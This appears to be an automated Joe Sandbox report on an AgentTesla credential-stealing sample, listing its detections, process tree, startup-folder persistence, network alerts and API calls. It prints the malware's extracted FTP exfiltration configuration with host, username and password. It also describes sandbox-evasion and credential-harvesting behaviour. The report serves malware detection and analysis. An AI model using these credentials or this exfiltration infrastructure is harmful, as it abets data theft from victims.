Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LfZAz7DQzo.exe

Overview

General Information

Sample name:LfZAz7DQzo.exe
renamed because original name is a hash value
Original sample name:1e6a8f176a0d7a9bd0321b4c032153f48b244be1584137453bf1afc07ea10157.exe
Analysis ID:1588800
MD5:79129cf9382f91ab74a895cd2c5a0c7f
SHA1:e1590b1a5ab3212dd35732affffb68236a2ca8b2
SHA256:1e6a8f176a0d7a9bd0321b4c032153f48b244be1584137453bf1afc07ea10157
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • LfZAz7DQzo.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\LfZAz7DQzo.exe" MD5: 79129CF9382F91AB74A895CD2C5A0C7F)
    • troopwise.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\LfZAz7DQzo.exe" MD5: 79129CF9382F91AB74A895CD2C5A0C7F)
      • RegSvcs.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\LfZAz7DQzo.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4284 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • troopwise.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\seskin\troopwise.exe" MD5: 79129CF9382F91AB74A895CD2C5A0C7F)
      • RegSvcs.exe (PID: 6164 cmdline: "C:\Users\user\AppData\Local\seskin\troopwise.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 22 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    2.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    2.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x3196b:$s2: GetPrivateProfileString
                    • 0x31018:$s3: get_OSFullName
                    • 0x32706:$s5: remove_Key
                    • 0x328b3:$s5: remove_Key
                    • 0x33795:$s6: FtpWebRequest
                    • 0x34717:$s7: logins
                    • 0x34c89:$s7: logins
                    • 0x3798e:$s7: logins
                    • 0x37a4c:$s7: logins
                    • 0x393a1:$s7: logins
                    • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 18 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , ProcessId: 4284, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs" , ProcessId: 4284, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\seskin\troopwise.exe, ProcessId: 7128, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T05:39:50.672589+010020299271A Network Trojan was detected192.168.2.449734162.241.62.6321TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T05:39:51.076312+010028555421A Network Trojan was detected192.168.2.449736162.241.62.6348091TCP
                    2025-01-11T05:39:51.083573+010028555421A Network Trojan was detected192.168.2.449736162.241.62.6348091TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 1.2.troopwise.exe.1be0000.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeReversingLabs: Detection: 71%
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeVirustotal: Detection: 61%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: LfZAz7DQzo.exeReversingLabs: Detection: 71%
                    Source: LfZAz7DQzo.exeVirustotal: Detection: 61%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: LfZAz7DQzo.exeJoe Sandbox ML: detected
                    Source: LfZAz7DQzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: troopwise.exe, 00000001.00000003.1762100016.0000000003700000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000001.00000003.1751043966.0000000003850000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1885559677.0000000004060000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1884597088.0000000004200000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: troopwise.exe, 00000001.00000003.1762100016.0000000003700000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000001.00000003.1751043966.0000000003850000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1885559677.0000000004060000.00000004.00001000.00020000.00000000.sdmp, troopwise.exe, 00000004.00000003.1884597088.0000000004200000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EE4696
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EEC9C7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEC93C FindFirstFileW,FindClose,0_2_00EEC93C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF200
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EEF35D
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEF65E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3A2B
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00EE3D4E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EEBF27
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B4696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_005B4696
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BC93C FindFirstFileW,FindClose,1_2_005BC93C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_005BC9C7
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005BF200
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005BF35D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005BF65E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005B3A2B
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005B3D4E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005BBF27

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49736 -> 162.241.62.63:48091
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49734 -> 162.241.62.63:21
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.4:49736 -> 162.241.62.63:48091
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 162.241.62.63 162.241.62.63
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownFTP traffic detected: 162.241.62.63:21 -> 192.168.2.4:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:39. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:39. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:39. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00EF25E2
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.antoniomayol.com
                    Source: RegSvcs.exe, 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antoniomayol.com
                    Source: RegSvcs.exe, 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.antoniomayol.com
                    Source: RegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: RegSvcs.exe, 00000002.00000002.1889523991.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.4204586491.00000000032CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EF425A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EF4458
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_005C4458
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00EF425A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00EE0219
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F0CDAC
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_005DCDAC

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: This is a third-party compiled AutoIt script.0_2_00E83B4C
                    Source: LfZAz7DQzo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: LfZAz7DQzo.exe, 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6c83ef5a-c
                    Source: LfZAz7DQzo.exe, 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cd5a7232-8
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: This is a third-party compiled AutoIt script.1_2_00553B4C
                    Source: troopwise.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: troopwise.exe, 00000001.00000002.1764206020.0000000000605000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0fc5db62-1
